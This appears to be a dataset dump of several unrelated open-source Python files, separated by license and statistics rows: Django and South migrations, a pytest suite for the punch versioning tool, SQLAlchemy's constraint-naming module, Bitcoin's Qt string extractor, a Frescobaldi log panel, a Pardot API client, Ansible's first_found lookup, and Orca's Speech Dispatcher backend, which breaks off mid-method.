('concerto-for-oboe-and-violin-bwv-1060r-in-g-minor', 'concerto-for-two-harpsichords-bwv-1060-in-c-minor'),
('double-violin-concerto-bwv-1043-in-d-minor', 'concerto-for-two-harpsichords-bwv-1062-in-c-minor'),
('concerto-for-three-violins-bwv-1064r-in-d', 'concerto-for-three-harpsichords-bwv-1064-in-c'),
('concerto-for-four-violins-op-3-no-10-rv-580-in-b-minor', 'concerto-for-three-harpsichords-bwv-1064-in-c'),
('concerto-for-oboe-damore-bwv-1055r-in-a', 'harpsichord-concerto-bwv-1055-in-a'),
)
}
for nature, data in relationships.items():
for x, y in data:
WorkRelationship.objects.create(
source=Work.objects.get(slug=x),
derived=Work.objects.get(slug=y),
nature=nature,
)
to_delete = ()
for klass, pks in to_delete:
for pk in pks:
try:
klass.objects.get(pk=pk).delete()
except klass.DoesNotExist:
print "W: Skipping deletion of", klass, pk
| agpl-3.0 | 4,716,751,957,606,330,000 | 47.243243 | 158 | 0.564986 | false |
lgiordani/punch | tests/script/test_complex_serializers.py | 1 | 2035 | import pytest
pytestmark = pytest.mark.slow
version_file_content = """
major = 1
minor = 0
patch = 0
"""
config_file_content = """
__config_version__ = 1
GLOBALS = {
'serializer': {
'semver': {
'search': 'Next Release',
'replace': '{{major}}.{{minor}}.{{patch}}'
}
},
}
FILES = ["CHANGELOG.rst"]
VERSION = ['major', 'minor', 'patch']
"""
config_file_content_dedicated_serializer = """
__config_version__ = 1
GLOBALS = {
'serializer': '{{major}}.{{minor}}.{{patch}}',
}
FILES = [
{
'path': "CHANGELOG.rst",
'serializer': {
'semver': {
'search': 'Next Release',
'replace': '{{major}}.{{minor}}.{{patch}}'
},
}
}
]
VERSION = ['major', 'minor', 'patch']
"""
changelog = """
Changelog
=========
Next Release
------------
**Added**
* Added some new feature
"""
expected_changelog = """
Changelog
=========
2.0.0
------------
**Added**
* Added some new feature
"""
def test_complex_serializer(test_environment):
test_environment.ensure_file_is_present("CHANGELOG.rst", changelog)
test_environment.ensure_file_is_present(
"punch_version.py",
version_file_content
)
test_environment.ensure_file_is_present(
"punch_config.py",
config_file_content
)
test_environment.call(["punch", "--part", "major"])
assert test_environment.get_file_content("CHANGELOG.rst") == \
expected_changelog
def test_complex_serializer_dedicated_serializers(test_environment):
test_environment.ensure_file_is_present("CHANGELOG.rst", changelog)
test_environment.ensure_file_is_present(
"punch_version.py",
version_file_content
)
test_environment.ensure_file_is_present(
"punch_config.py",
config_file_content_dedicated_serializer
)
test_environment.call(["punch", "--part", "major"])
assert test_environment.get_file_content("CHANGELOG.rst") == \
expected_changelog
| isc | 8,717,487,821,526,093,000 | 17.842593 | 71 | 0.57543 | false |
michaelBenin/sqlalchemy | lib/sqlalchemy/sql/naming.py | 1 | 5728 | # sqlalchemy/naming.py
# Copyright (C) 2005-2014 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Establish constraint and index naming conventions.
"""
from .schema import Constraint, ForeignKeyConstraint, PrimaryKeyConstraint, \
UniqueConstraint, CheckConstraint, Index, Table, Column
from .. import event, events
from .. import exc
from .elements import _truncated_label
import re
class conv(_truncated_label):
"""Mark a string indicating that a name has already been converted
by a naming convention.
This is a string subclass that indicates a name that should not be
subject to any further naming conventions.
E.g. when we create a :class:`.Constraint` using a naming convention
as follows::
m = MetaData(naming_convention={"ck": "ck_%(table_name)s_%(constraint_name)s"})
t = Table('t', m, Column('x', Integer),
CheckConstraint('x > 5', name='x5'))
The name of the above constraint will be rendered as ``"ck_t_x5"``. That is,
the existing name ``x5`` is used in the naming convention as the ``constraint_name``
token.
In some situations, such as in migration scripts, we may be rendering
the above :class:`.CheckConstraint` with a name that's already been
converted. In order to make sure the name isn't double-modified, the
new name is applied using the :func:`.schema.conv` marker. We can
use this explicitly as follows::
m = MetaData(naming_convention={"ck": "ck_%(table_name)s_%(constraint_name)s"})
t = Table('t', m, Column('x', Integer),
CheckConstraint('x > 5', name=conv('ck_t_x5')))
Where above, the :func:`.schema.conv` marker indicates that the constraint
name here is final, and the name will render as ``"ck_t_x5"`` and not
``"ck_t_ck_t_x5"``
.. versionadded:: 0.9.4
.. seealso::
:ref:`constraint_naming_conventions`
"""
class ConventionDict(object):
def __init__(self, const, table, convention):
self.const = const
self._is_fk = isinstance(const, ForeignKeyConstraint)
self.table = table
self.convention = convention
self._const_name = const.name
def _key_table_name(self):
return self.table.name
def _column_X(self, idx):
if self._is_fk:
fk = self.const.elements[idx]
return fk.parent
else:
return list(self.const.columns)[idx]
def _key_constraint_name(self):
if not self._const_name:
raise exc.InvalidRequestError(
"Naming convention including "
"%(constraint_name)s token requires that "
"constraint is explicitly named."
)
if not isinstance(self._const_name, conv):
self.const.name = None
return self._const_name
def _key_column_X_name(self, idx):
return self._column_X(idx).name
def _key_column_X_label(self, idx):
return self._column_X(idx)._label
def _key_referred_table_name(self):
fk = self.const.elements[0]
refs = fk.target_fullname.split(".")
if len(refs) == 3:
refschema, reftable, refcol = refs
else:
reftable, refcol = refs
return reftable
def _key_referred_column_X_name(self, idx):
fk = self.const.elements[idx]
refs = fk.target_fullname.split(".")
if len(refs) == 3:
refschema, reftable, refcol = refs
else:
reftable, refcol = refs
return refcol
def __getitem__(self, key):
if key in self.convention:
return self.convention[key](self.const, self.table)
elif hasattr(self, '_key_%s' % key):
return getattr(self, '_key_%s' % key)()
else:
col_template = re.match(r".*_?column_(\d+)_.+", key)
if col_template:
idx = col_template.group(1)
attr = "_key_" + key.replace(idx, "X")
idx = int(idx)
if hasattr(self, attr):
return getattr(self, attr)(idx)
raise KeyError(key)
_prefix_dict = {
Index: "ix",
PrimaryKeyConstraint: "pk",
CheckConstraint: "ck",
UniqueConstraint: "uq",
ForeignKeyConstraint: "fk"
}
def _get_convention(dict_, key):
for super_ in key.__mro__:
if super_ in _prefix_dict and _prefix_dict[super_] in dict_:
return dict_[_prefix_dict[super_]]
elif super_ in dict_:
return dict_[super_]
else:
return None
@event.listens_for(Constraint, "after_parent_attach")
@event.listens_for(Index, "after_parent_attach")
def _constraint_name(const, table):
if isinstance(table, Column):
# for column-attached constraint, set another event
# to link the column attached to the table as this constraint
# associated with the table.
event.listen(table, "after_parent_attach",
lambda col, table: _constraint_name(const, table)
)
elif isinstance(table, Table):
metadata = table.metadata
convention = _get_convention(metadata.naming_convention, type(const))
if convention is not None:
if const.name is None or "constraint_name" in convention:
newname = conv(
convention % ConventionDict(const, table, metadata.naming_convention)
)
if const.name is None:
const.name = newname
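# Illustrative convention dict covering the constraint types handled above
# (the token names are defined by ConventionDict; the format strings are
# application choices, not mandated by SQLAlchemy):
#
#     naming_convention = {
#         "ix": "ix_%(column_0_label)s",
#         "uq": "uq_%(table_name)s_%(column_0_name)s",
#         "ck": "ck_%(table_name)s_%(constraint_name)s",
#         "fk": "fk_%(table_name)s_%(column_0_name)s_%(referred_table_name)s",
#         "pk": "pk_%(table_name)s",
#     }
#     metadata = MetaData(naming_convention=naming_convention)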
| mit | -7,769,484,997,395,845,000 | 33.506024 | 97 | 0.597416 | false |
fanglinfang/myuw | myuw/migrations/0002_auto__add_unique_usernotices_notice_hash_user__add_field_categorylinks.py | 1 | 6154 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Eh, I'm not so worried about tracking user notices that this is a problem
db.clear_table(u'myuw_mobile_usernotices')
# Adding unique constraint on 'UserNotices', fields ['notice_hash', 'user']
db.create_unique(u'myuw_mobile_usernotices', ['notice_hash', 'user_id'])
# Adding field 'CategoryLinks.new_tab'
db.add_column(u'myuw_mobile_categorylinks', 'new_tab',
self.gf('django.db.models.fields.BooleanField')(default=False),
keep_default=False)
def backwards(self, orm):
# Removing unique constraint on 'UserNotices', fields ['notice_hash', 'user']
db.delete_unique(u'myuw_mobile_usernotices', ['notice_hash', 'user_id'])
# Deleting field 'CategoryLinks.new_tab'
db.delete_column(u'myuw_mobile_categorylinks', 'new_tab')
models = {
u'myuw.building': {
'Meta': {'object_name': 'Building'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '6', 'db_index': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'latititude': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'longitude': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'myuw.categorylinks': {
'Meta': {'object_name': 'CategoryLinks'},
'campus': ('django.db.models.fields.CharField', [], {'max_length': '8', 'null': 'True'}),
'category_id': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'category_name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'new_tab': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'sub_category': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '150'}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '150'})
},
u'myuw.coursecolor': {
'Meta': {'object_name': 'CourseColor'},
'color_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'course_number': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'curriculum_abbr': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {}),
'quarter': ('django.db.models.fields.CharField', [], {'max_length': '10', 'db_index': 'True'}),
'regid': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'section_id': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
'year': ('django.db.models.fields.PositiveSmallIntegerField', [], {'db_index': 'True'})
},
u'myuw.studentaccountsbalances': {
'Meta': {'object_name': 'StudentAccountsBalances'},
'asof_datetime': ('django.db.models.fields.DateTimeField', [], {}),
'employee_id': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '10', 'null': 'True', 'blank': 'True'}),
'husky_card': ('django.db.models.fields.DecimalField', [], {'default': '0.0', 'max_digits': '6', 'decimal_places': '2'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_am': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'residence_hall_dining': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '7', 'decimal_places': '2', 'blank': 'True'}),
'student_number': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '10', 'db_index': 'True'})
},
u'myuw.tuitiondate': {
'Meta': {'object_name': 'TuitionDate'},
'date': ('django.db.models.fields.DateField', [], {}),
'date_stored': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['myuw.User']", 'unique': 'True', 'on_delete': 'models.PROTECT'})
},
u'myuw.user': {
'Meta': {'object_name': 'User'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_visit': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2014, 9, 15, 0, 0)'}),
'uwnetid': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '16'}),
'uwregid': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True', 'db_index': 'True'})
},
u'myuw.usernotices': {
'Meta': {'unique_together': "(('notice_hash', 'user'),)", 'object_name': 'UserNotices'},
'first_viewed': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_read': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'marked_read': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'notice_hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['myuw.User']", 'on_delete': 'models.PROTECT'})
}
}
complete_apps = ['myuw']
| apache-2.0 | 4,205,599,867,594,422,300 | 62.443299 | 159 | 0.553136 | false |
jn2840/bitcoin | share/qt/extract_strings_qt.py | 1 | 1875 | #!/usr/bin/python
'''
Extract _("...") strings for translation and convert to Qt4 stringdefs so that
they can be picked up by Qt linguist.
'''
from subprocess import Popen, PIPE
import glob
import operator
import os
import sys
OUT_CPP="qt/bitcoinstrings.cpp"
EMPTY=['""']
def parse_po(text):
"""
Parse 'po' format produced by xgettext.
Return a list of (msgid,msgstr) tuples.
"""
messages = []
msgid = []
msgstr = []
in_msgid = False
in_msgstr = False
for line in text.split('\n'):
line = line.rstrip('\r')
if line.startswith('msgid '):
if in_msgstr:
messages.append((msgid, msgstr))
in_msgstr = False
# message start
in_msgid = True
msgid = [line[6:]]
elif line.startswith('msgstr '):
in_msgid = False
in_msgstr = True
msgstr = [line[7:]]
elif line.startswith('"'):
if in_msgid:
msgid.append(line)
if in_msgstr:
msgstr.append(line)
if in_msgstr:
messages.append((msgid, msgstr))
return messages
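# Illustrative parse_po() behaviour on a minimal (hypothetical) xgettext fragment:
#
#     msgid "Options:"
#     msgstr ""
#
# yields [(['"Options:"'], ['""'])] -- values keep their surrounding quotes.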
files = sys.argv[1:]
# xgettext -n --keyword=_ $FILES
XGETTEXT=os.getenv('XGETTEXT', 'xgettext')
child = Popen([XGETTEXT,'--output=-','-n','--keyword=_'] + files, stdout=PIPE)
(out, err) = child.communicate()
messages = parse_po(out)
f = open(OUT_CPP, 'w')
f.write("""
#include <QtGlobal>
// Automatically generated by extract_strings.py
#ifdef __GNUC__
#define UNUSED __attribute__((unused))
#else
#define UNUSED
#endif
""")
f.write('static const char UNUSED *bitcoin_strings[] = {\n')
messages.sort(key=operator.itemgetter(0))
for (msgid, msgstr) in messages:
if msgid != EMPTY:
f.write('QT_TRANSLATE_NOOP("beardcoin-core", %s),\n' % ('\n'.join(msgid)))
f.write('};\n')
f.close()
| mit | 1,085,203,892,940,296,700 | 23.038462 | 82 | 0.578667 | false |
anthonyfok/frescobaldi | frescobaldi_app/logtool/__init__.py | 1 | 3820 | # This file is part of the Frescobaldi project, http://www.frescobaldi.org/
#
# Copyright (c) 2008 - 2014 by Wilbert Berendsen
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
# See http://www.gnu.org/licenses/ for more information.
"""
The log dockwindow.
"""
from PyQt5.QtCore import QSettings, Qt
from PyQt5.QtGui import QKeySequence
from PyQt5.QtWidgets import QAction
import actioncollection
import actioncollectionmanager
import app
import panel
class LogTool(panel.Panel):
"""A dockwidget showing the log of running Jobs."""
def __init__(self, mainwindow):
super(LogTool, self).__init__(mainwindow)
self.hide()
self.toggleViewAction().setShortcut(QKeySequence("Meta+Alt+L"))
ac = self.actionCollection = Actions()
ac.log_next_error.triggered.connect(self.slotNextError)
ac.log_previous_error.triggered.connect(self.slotPreviousError)
actioncollectionmanager.manager(mainwindow).addActionCollection(ac)
mainwindow.addDockWidget(Qt.BottomDockWidgetArea, self)
app.jobStarted.connect(self.slotJobStarted)
app.jobFinished.connect(self.slotJobFinished)
def translateUI(self):
self.setWindowTitle(_("LilyPond Log"))
self.toggleViewAction().setText(_("LilyPond &Log"))
def createWidget(self):
from . import logwidget
return logwidget.LogWidget(self)
def slotJobStarted(self, doc, job):
"""Called whenever job starts, decides whether to follow it and show the log."""
import jobattributes
jattrs = jobattributes.get(job)
if doc == self.mainwindow().currentDocument() or self.mainwindow() == jattrs.mainwindow:
self.widget().switchDocument(doc)
if not jattrs.hidden and QSettings().value("log/show_on_start", True, bool):
self.show()
def slotJobFinished(self, document, job, success):
import jobattributes
if (not success and not job.is_aborted()
and not jobattributes.get(job).hidden
and document == self.mainwindow().currentDocument()):
self.show()
def slotNextError(self):
"""Jumps to the position pointed to by the next error message."""
self.activate()
self.widget().gotoError(1)
def slotPreviousError(self):
"""Jumps to the position pointed to by the next error message."""
self.activate()
self.widget().gotoError(-1)
class Actions(actioncollection.ActionCollection):
name = "logtool"
def createActions(self, parent=None):
self.log_next_error = QAction(parent)
self.log_previous_error = QAction(parent)
self.log_next_error.setShortcut(QKeySequence("Ctrl+E"))
self.log_previous_error.setShortcut(QKeySequence("Ctrl+Shift+E"))
def translateUI(self):
self.log_next_error.setText(_("Next Error Message"))
self.log_previous_error.setText(_("Previous Error Message"))
# log errors by initializing Errors instance
@app.jobStarted.connect
def _log_errors(document):
from . import errors
errors.errors(document)
| gpl-2.0 | -6,433,061,246,334,416,000 | 36.087379 | 96 | 0.685079 | false |
joshgeller/PyPardot | pypardot/objects/opportunities.py | 1 | 3806 | class Opportunities(object):
"""
A class to query and use Pardot opportunities.
Opportunity field reference: http://developer.pardot.com/kb/api-version-3/object-field-references/#opportunity
"""
def __init__(self, client):
self.client = client
def query(self, **kwargs):
"""
Returns the opportunities matching the specified criteria parameters.
Supported search criteria: http://developer.pardot.com/kb/api-version-3/opportunities/#supported-search-criteria
"""
response = self._get(path='/do/query', params=kwargs)
# Ensure result['opportunity'] is a list, no matter what.
result = response.get('result')
if result['total_results'] == 0:
result['opportunity'] = []
elif result['total_results'] == 1:
result['opportunity'] = [result['opportunity']]
return result
def create_by_email(self, prospect_email=None, name=None, value=None, probability=None, **kwargs):
"""
Creates a new opportunity using the specified data. <prospect_email> must correspond to an existing prospect.
"""
kwargs.update({'name': name, 'value': value, 'probability': probability})
response = self._post(
path='/do/create/prospect_email/{prospect_email}'.format(prospect_email=prospect_email),
params=kwargs)
return response
def create_by_id(self, prospect_id=None, name=None, value=None, probability=None, **kwargs):
"""
Creates a new opportunity using the specified data. <prospect_id> must correspond to an existing prospect.
"""
kwargs.update({'name': name, 'value': value, 'probability': probability})
response = self._post(
path='/do/create/prospect_id/{prospect_id}'.format(prospect_id=prospect_id),
params=kwargs)
return response
def read(self, id=None):
"""
Returns the data for the opportunity specified by <id>, including campaign assignment and associated visitor
activities. <id> is the Pardot ID for the target opportunity.
"""
response = self._post(path='/do/read/id/{id}'.format(id=id))
return response
def update(self, id=None):
"""
Updates the provided data for the opportunity specified by <id>. <id> is the Pardot ID for the target
opportunity. Fields that are not updated by the request remain unchanged. Returns an updated version of the
opportunity.
"""
response = self._post(path='/do/update/id/{id}'.format(id=id))
return response
def delete(self, id=None):
"""
Deletes the opportunity specified by <id>. <id> is the Pardot ID for the target opportunity. Returns no response
on success.
"""
response = self._post(path='/do/delete/id/{id}'.format(id=id))
return response
def undelete(self, id=None):
"""
Un-deletes the opportunity specified by <id>. <id> is the Pardot ID for the target opportunity. Returns no
response on success.
"""
response = self._post(path='/do/undelete/id/{id}'.format(id=id))
return response
def _get(self, object_name='opportunity', path=None, params=None):
"""GET requests for the Opportunity object."""
if params is None:
params = {}
response = self.client.get(object_name=object_name, path=path, params=params)
return response
def _post(self, object_name='opportunity', path=None, params=None):
"""POST requests for the Opportunity object."""
if params is None:
params = {}
response = self.client.post(object_name=object_name, path=path, params=params)
return response
| mit | -5,657,057,192,978,973,000 | 40.824176 | 120 | 0.625854 | false |
dmsimard/ansible | lib/ansible/plugins/lookup/first_found.py | 1 | 7109 | # (c) 2013, seth vidal <[email protected]> red hat, inc
# (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = """
name: first_found
author: Seth Vidal (!UNKNOWN) <[email protected]>
version_added: historical
short_description: return first file found from list
description:
- this lookup checks a list of files and paths and returns the full path to the first combination found.
- As with all lookups, when fed relative paths it will try to use the current task's location first and go up the chain
to the containing role/play/include/etc's location.
- The list of files has precedence over the paths searched.
i.e., if a task in a role has a 'file1' in the play's relative path, that will be used; a 'file2' in the role's relative path will not.
- Either a list of files C(_terms) or a key `files` with a list of files is required for this plugin to operate.
notes:
- This lookup can be used in 'dual mode', either passing a list of file names or a dictionary that has C(files) and C(paths).
options:
_terms:
description: list of file names
files:
description: list of file names
type: list
default: []
paths:
description: list of paths in which to look for the files
type: list
default: []
skip:
type: boolean
default: False
description: Return an empty list if no file is found, instead of an error.
"""
EXAMPLES = """
- name: show first existing file or ignore if none do
debug: msg={{lookup('first_found', findme, errors='ignore')}}
vars:
findme:
- "/path/to/foo.txt"
- "bar.txt" # will be looked in files/ dir relative to role and/or play
- "/path/to/biz.txt"
- name: |
include tasks only if files exist. Note the use of query() to return
a blank list for the loop if no files are found.
import_tasks: '{{ item }}'
vars:
params:
files:
- path/tasks.yaml
- path/other_tasks.yaml
loop: "{{ query('first_found', params, errors='ignore') }}"
- name: |
copy first existing file found to /some/file,
looking in relative directories from where the task is defined and
including any play objects that contain it
copy: src={{lookup('first_found', findme)}} dest=/some/file
vars:
findme:
- foo
- "{{inventory_hostname}}"
- bar
- name: same copy but specific paths
copy: src={{lookup('first_found', params)}} dest=/some/file
vars:
params:
files:
- foo
- "{{inventory_hostname}}"
- bar
paths:
- /tmp/production
- /tmp/staging
- name: INTERFACES | Create Ansible header for /etc/network/interfaces
template:
src: "{{ lookup('first_found', findme)}}"
dest: "/etc/foo.conf"
vars:
findme:
- "{{ ansible_virtualization_type }}_foo.conf"
- "default_foo.conf"
- name: read vars from first file found, use 'vars/' relative subdir
include_vars: "{{lookup('first_found', params)}}"
vars:
params:
files:
- '{{ansible_distribution}}.yml'
- '{{ansible_os_family}}.yml'
- default.yml
paths:
- 'vars'
"""
RETURN = """
_raw:
description:
- path to file found
type: list
elements: path
"""
import os
from jinja2.exceptions import UndefinedError
from ansible.errors import AnsibleLookupError, AnsibleUndefinedVariable
from ansible.module_utils.common._collections_compat import Mapping, Sequence
from ansible.module_utils.six import string_types
from ansible.plugins.lookup import LookupBase
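# Split a string (or each element of a list) on any of the given separator characters,
# returning a flat list of terms.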
def _split_on(terms, spliters=','):
# TODO: fix as it does not allow spaces in names
termlist = []
if isinstance(terms, string_types):
for spliter in spliters:
terms = terms.replace(spliter, ' ')
termlist = terms.split(' ')
else:
# added since options will already listify
for t in terms:
termlist.extend(_split_on(t, spliters))
return termlist
class LookupModule(LookupBase):
def _process_terms(self, terms, variables, kwargs):
total_search = []
skip = False
# can use a dict instead of list item to pass inline config
for term in terms:
if isinstance(term, Mapping):
self.set_options(var_options=variables, direct=term)
elif isinstance(term, string_types):
self.set_options(var_options=variables, direct=kwargs)
elif isinstance(term, Sequence):
partial, skip = self._process_terms(term, variables, kwargs)
total_search.extend(partial)
continue
else:
raise AnsibleLookupError("Invalid term supplied, can handle string, mapping or list of strings but got: %s for %s" % (type(term), term))
files = self.get_option('files')
paths = self.get_option('paths')
# NOTE: this is used as 'global' but can be set many times?!?!?
skip = self.get_option('skip')
# magic extra splitting to create lists
filelist = _split_on(files, ',;')
pathlist = _split_on(paths, ',:;')
# create search structure
if pathlist:
for path in pathlist:
for fn in filelist:
f = os.path.join(path, fn)
total_search.append(f)
elif filelist:
# NOTE: this seems wrong, should be 'extend' as any option/entry can clobber all
total_search = filelist
else:
total_search.append(term)
return total_search, skip
def run(self, terms, variables, **kwargs):
total_search, skip = self._process_terms(terms, variables, kwargs)
# NOTE: during refactor noticed that the 'using a dict' as term
# is designed to only work with 'one' otherwise inconsistencies will appear.
# see other notes below.
# actually search
subdir = getattr(self, '_subdir', 'files')
path = None
for fn in total_search:
try:
fn = self._templar.template(fn)
except (AnsibleUndefinedVariable, UndefinedError):
continue
# get subdir if set by task executor, default to files otherwise
path = self.find_file_in_search_path(variables, subdir, fn, ignore_missing=True)
# exit if we find one!
if path is not None:
return [path]
# if we get here, no file was found
if skip:
# NOTE: global skip won't matter, only the last 'skip' value in a dict term
return []
raise AnsibleLookupError("No file was found when using first_found. Use errors='ignore' to allow this task to be skipped if no files are found")
| gpl-3.0 | -7,768,599,136,003,885,000 | 33.014354 | 152 | 0.608524 | false |
chrys87/orca-beep | src/orca/speechdispatcherfactory.py | 1 | 20607 | # Copyright 2006, 2007, 2008, 2009 Brailcom, o.p.s.
#
# Author: Tomas Cerha <[email protected]>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., Franklin Street, Fifth Floor,
# Boston MA 02110-1301 USA.
# # [[[TODO: richb - Pylint is giving us a bunch of warnings along these
# lines throughout this file:
#
# W0142:202:SpeechServer._send_command: Used * or ** magic
#
# So for now, we just disable these warnings in this module.]]]
#
# pylint: disable-msg=W0142
"""Provides an Orca speech server for Speech Dispatcher backend."""
__id__ = "$Id$"
__version__ = "$Revision$"
__date__ = "$Date$"
__author__ = "Tomas Cerha <[email protected]>"
__copyright__ = "Copyright (c) 2006-2008 Brailcom, o.p.s."
__license__ = "LGPL"
from gi.repository import GLib
import re
import time
from . import chnames
from . import debug
from . import guilabels
from . import messages
from . import speechserver
from . import settings
from . import orca_state
from . import punctuation_settings
from .acss import ACSS
try:
import speechd
except:
_speechd_available = False
else:
_speechd_available = True
try:
getattr(speechd, "CallbackType")
except AttributeError:
_speechd_version_ok = False
else:
_speechd_version_ok = True
PUNCTUATION = re.compile('[^\w\s]', re.UNICODE)
ELLIPSIS = re.compile('(\342\200\246|(?<!\.)\.{3,4}(?=(\s|\Z)))')
class SpeechServer(speechserver.SpeechServer):
# See the parent class for documentation.
_active_servers = {}
DEFAULT_SERVER_ID = 'default'
_SERVER_NAMES = {DEFAULT_SERVER_ID: guilabels.DEFAULT_SYNTHESIZER}
def getFactoryName():
return guilabels.SPEECH_DISPATCHER
getFactoryName = staticmethod(getFactoryName)
def getSpeechServers():
servers = []
default = SpeechServer._getSpeechServer(SpeechServer.DEFAULT_SERVER_ID)
if default is not None:
servers.append(default)
for module in default.list_output_modules():
servers.append(SpeechServer._getSpeechServer(module))
return servers
getSpeechServers = staticmethod(getSpeechServers)
def _getSpeechServer(cls, serverId):
"""Return an active server for given id.
Attempt to create the server if it doesn't exist yet. Returns None
when it is not possible to create the server.
"""
if serverId not in cls._active_servers:
cls(serverId)
# Don't return the instance, unless it is successfully added
# to `_active_servers'.
return cls._active_servers.get(serverId)
_getSpeechServer = classmethod(_getSpeechServer)
def getSpeechServer(info=None):
if info is not None:
thisId = info[1]
else:
thisId = SpeechServer.DEFAULT_SERVER_ID
return SpeechServer._getSpeechServer(thisId)
getSpeechServer = staticmethod(getSpeechServer)
def shutdownActiveServers():
for server in list(SpeechServer._active_servers.values()):
server.shutdown()
shutdownActiveServers = staticmethod(shutdownActiveServers)
# *** Instance methods ***
def __init__(self, serverId):
super(SpeechServer, self).__init__()
self._id = serverId
self._client = None
self._current_voice_properties = {}
self._acss_manipulators = (
(ACSS.RATE, self._set_rate),
(ACSS.AVERAGE_PITCH, self._set_pitch),
(ACSS.GAIN, self._set_volume),
(ACSS.FAMILY, self._set_family),
)
if not _speechd_available:
msg = 'ERROR: Speech Dispatcher is not available'
debug.println(debug.LEVEL_WARNING, msg, True)
return
if not _speechd_version_ok:
msg = 'ERROR: Speech Dispatcher version 0.6.2 or later is required.'
debug.println(debug.LEVEL_WARNING, msg, True)
return
# The following constants must be initialized in runtime since they
# depend on the speechd module being available.
self._PUNCTUATION_MODE_MAP = {
settings.PUNCTUATION_STYLE_ALL: speechd.PunctuationMode.ALL,
settings.PUNCTUATION_STYLE_MOST: speechd.PunctuationMode.SOME,
settings.PUNCTUATION_STYLE_SOME: speechd.PunctuationMode.SOME,
settings.PUNCTUATION_STYLE_NONE: speechd.PunctuationMode.NONE,
}
self._CALLBACK_TYPE_MAP = {
speechd.CallbackType.BEGIN: speechserver.SayAllContext.PROGRESS,
speechd.CallbackType.CANCEL: speechserver.SayAllContext.INTERRUPTED,
speechd.CallbackType.END: speechserver.SayAllContext.COMPLETED,
#speechd.CallbackType.INDEX_MARK:speechserver.SayAllContext.PROGRESS,
}
self._default_voice_name = guilabels.SPEECH_DEFAULT_VOICE % serverId
try:
self._init()
except:
debug.printException(debug.LEVEL_WARNING)
msg = 'ERROR: Speech Dispatcher service failed to connect'
debug.println(debug.LEVEL_WARNING, msg, True)
else:
SpeechServer._active_servers[serverId] = self
self._lastKeyEchoTime = None
def _init(self):
self._client = client = speechd.SSIPClient('Orca', component=self._id)
client.set_priority(speechd.Priority.MESSAGE)
if self._id != self.DEFAULT_SERVER_ID:
client.set_output_module(self._id)
self._current_voice_properties = {}
mode = self._PUNCTUATION_MODE_MAP[settings.verbalizePunctuationStyle]
client.set_punctuation(mode)
def updateCapitalizationStyle(self):
"""Updates the capitalization style used by the speech server."""
if settings.capitalizationStyle == settings.CAPITALIZATION_STYLE_ICON:
style = 'icon'
elif settings.capitalizationStyle == settings.CAPITALIZATION_STYLE_SPELL:
style = 'spell'
else:
style = 'none'
self._client.set_cap_let_recogn(style)
def updatePunctuationLevel(self):
""" Punctuation level changed, inform this speechServer. """
mode = self._PUNCTUATION_MODE_MAP[settings.verbalizePunctuationStyle]
